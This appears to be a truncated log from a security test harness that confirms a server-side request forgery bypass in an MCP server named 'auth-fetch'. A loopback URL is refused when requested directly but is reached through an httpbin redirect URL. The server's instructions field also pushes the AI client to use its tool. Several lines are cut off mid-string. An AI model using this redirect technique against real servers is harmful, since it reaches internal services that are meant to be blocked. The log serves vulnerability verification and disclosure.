[VICTIM] Listening on 127.0.0.1:18080 marker=VARIANT_SSRF_MARKER_1783015938684_hxthl7ty [MCP-SEND] {"jsonrpc":"2.0","id":1,"method":"initialize","params":{"protocolVersion":"2024-11-05","capabilities":{},"clientInfo":{"name":"variant-ssrf-client","version":"1.0.0"}}} [MCP-RESP] {"result":{"protocolVersion":"2024-11-05","capabilities":{"tools":{"listChanged":true}},"serverInfo":{"name":"auth-fetch","version":"3.0.2"},"instructions":"When a user asks to read, summarize, or access a URL and Fetch/web_fetch returns a login page, empty HTML shell, or minimal content (especially from Notion, Google Docs, Jira, Confluence, Linear, Slack, or any SaaS platform), you MUST use the [MCP-SEND] {"jsonrpc":"2.0","method":"notifications/initialized"} [MCP-SEND] {"jsonrpc":"2.0","id":2,"method":"tools/call","params":{"name":"download_media","arguments":{"urls":["http://127.0.0.1:18080/direct-control","http://httpbin.org/redirect-to?url=htt [VICTIM:18080] 2026-07-02T18:12:19.949Z Request from 127.0.0.1 path=/ host=127.0.0.1:18080 [MCP-RESP] {"result":{"content":[{"type":"text","text":"{\"status\":\"ok\",\"directory\":\"/data/pruva/runs/fd8b0986-aae9-476e-9f56-120d746759eb/bundle/logs/vuln_variant/mcp-home-main-variant/.auth-fetch-mcp/downloads/2026-07-02T18-12-19\",\"downloaded\":1,\"total\":2,\"files\":[{\"url\":\"http://127.0.0.1:18080/direct-control\",\"error\":\"Refusing to fetch 127.0.0.1 (resolves to private/loopback/link-local *** REDIRECT BYPASS CONFIRMED [main-variant]: control blocked, variant reached loopback via redirect ***